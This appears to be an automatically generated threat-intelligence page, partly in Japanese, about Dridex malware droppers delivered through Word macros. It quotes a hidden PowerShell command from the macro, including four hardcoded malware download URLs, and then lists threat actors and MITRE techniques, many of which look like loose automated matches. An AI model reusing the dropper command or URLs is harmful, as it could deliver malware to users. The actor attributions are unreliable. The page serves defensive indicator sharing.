Trusted Design

Dridex droppers

概要

The mentioned URL were hardcoded in the obfuscated vbscript that was embedded a macro in a doc file Below is the command : cmd.exe /c start /b powershell -WindowStyle Hidden $wscript = new-object -ComObject WScript.Shell;$webclient = new-object System.Net.WebClient;$word = new-object -ComObject word.application;$random = new-object random;$version = $word.version;$urls = 'http://meyermuehltal.de/0h656jk,http://technologyservice.eu/0h656jk,http://tspars.com/0h656jk,http://thaipowertools.com/0h656jk'.Split(',');

Created: 2026-02-23

Indicators

Indicatorsは見つかっていない。

類似Pulses

Dridex Download URL from Malicious Macro - 05/05/2016 (score: 0.71)
Spam Delivering Malicious Word Document (score: 0.63)
PowerSniff Malware Used in Macro-based Attacks (score: 0.56)
Dyre Botnet Using Malicious Microsoft Word Macros (score: 0.56)
Dridex SPAM campaign (score: 0.55)

このPulseに関連する脅威アクター (事実ベース)

APT32

Score: 9.84

Matched TTPs:

T1110.001 - Password Guessing
T1601.001 - Patch System Image
T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

Medusa Group

Score: 10.39

Matched TTPs:

T1218.003 - CMSTP
T1601.001 - Patch System Image
T1547.013 - XDG Autostart Entries
T1216 - System Script Proxy Execution

MITREへのリンク →

Threat Group-3390

Score: 8.06

Matched TTPs:

T1218.003 - CMSTP
T1547.013 - XDG Autostart Entries
T1546.017 - Udev Rules

MITREへのリンク →

Kimsuky

Score: 9.77

Matched TTPs:

T1608 - Stage Capabilities
T1601.001 - Patch System Image
T1547.013 - XDG Autostart Entries
T1008 - Fallback Channels

MITREへのリンク →

Gamaredon Group

Score: 9.64

Matched TTPs:

T1608 - Stage Capabilities
T1601.001 - Patch System Image
T1547.013 - XDG Autostart Entries
T1546.017 - Udev Rules

MITREへのリンク →

Mustang Panda

Score: 7.29

Matched TTPs:

T1608 - Stage Capabilities
T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

APT28

Score: 7.98

Matched TTPs:

T1548.004 - Elevated Execution with Prompt
T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

APT29

Score: 5.31

Matched TTPs:

T1218.009 - Regsvcs/Regasm
T1547.013 - XDG Autostart Entries

MITREへのリンク →

Patchwork

Score: 5.93

Matched TTPs:

T1601.001 - Patch System Image
T1547.013 - XDG Autostart Entries
T1008 - Fallback Channels

MITREへのリンク →

FIN7

Score: 5.31

Matched TTPs:

T1601.001 - Patch System Image
T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

HAFNIUM

Score: 3.44

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

Tropic Trooper

Score: 3.44

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

Lazarus Group

Score: 7.06

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer
T1216 - System Script Proxy Execution

MITREへのリンク →

APT37

Score: 4.40

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1216 - System Script Proxy Execution

MITREへのリンク →

TA2541

Score: 3.93

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1546.017 - Udev Rules

MITREへのリンク →

Leviathan

Score: 3.93

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1546.017 - Udev Rules

MITREへのリンク →

Molerats

Score: 3.93

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1546.017 - Udev Rules

MITREへのリンク →

Rocke

Score: 6.73

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer
T1008 - Fallback Channels

MITREへのリンク →

APT38

Score: 4.40

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1216 - System Script Proxy Execution

MITREへのリンク →

LuminousMoth

Score: 3.44

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

FIN13

Score: 3.44

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1105 - Ingress Tool Transfer

MITREへのリンク →

APT41

Score: 4.06

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1008 - Fallback Channels

MITREへのリンク →

BRONZE BUTLER

Score: 4.06

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1008 - Fallback Channels

MITREへのリンク →

Axiom

Score: 4.54

Matched TTPs:

T1160 - Launch Daemon

MITREへのリンク →

RTM

Score: 3.29

Matched TTPs:

T1008 - Fallback Channels

MITREへのリンク →

Higaisa

Score: 3.15

Matched TTPs:

T1546.017 - Udev Rules

MITREへのリンク →

Mofang

Score: 3.15

Matched TTPs:

T1546.017 - Udev Rules

MITREへのリンク →

このPulseに関連する脅威アクター (推論ベース)

Medusa Group

Score: 0.74

Matched TTPs:

T1218.003 - CMSTP
T1547.013 - XDG Autostart Entries
T1601.001 - Patch System Image
T1216 - System Script Proxy Execution

MITREへのリンク →

APT32

Score: 0.74

Matched TTPs:

T1105 - Ingress Tool Transfer
T1547.013 - XDG Autostart Entries
T1601.001 - Patch System Image
T1110.001 - Password Guessing

MITREへのリンク →

Kimsuky

Score: 0.69

Matched TTPs:

T1008 - Fallback Channels
T1547.013 - XDG Autostart Entries
T1601.001 - Patch System Image
T1608 - Stage Capabilities

MITREへのリンク →

Gamaredon Group

Score: 0.69

Matched TTPs:

T1546.017 - Udev Rules
T1547.013 - XDG Autostart Entries
T1601.001 - Patch System Image
T1608 - Stage Capabilities

MITREへのリンク →

Threat Group-3390

Score: 0.62

Matched TTPs:

T1218.003 - CMSTP
T1546.017 - Udev Rules
T1547.013 - XDG Autostart Entries

MITREへのリンク →

APT28

Score: 0.59

Matched TTPs:

T1547.013 - XDG Autostart Entries
T1548.004 - Elevated Execution with Prompt
T1105 - Ingress Tool Transfer

MITREへのリンク →

Related CVEs

このPulseに見つかったCVEはありません。

Pulse – 脅威アクターグラフ

← Pulse一覧に戻る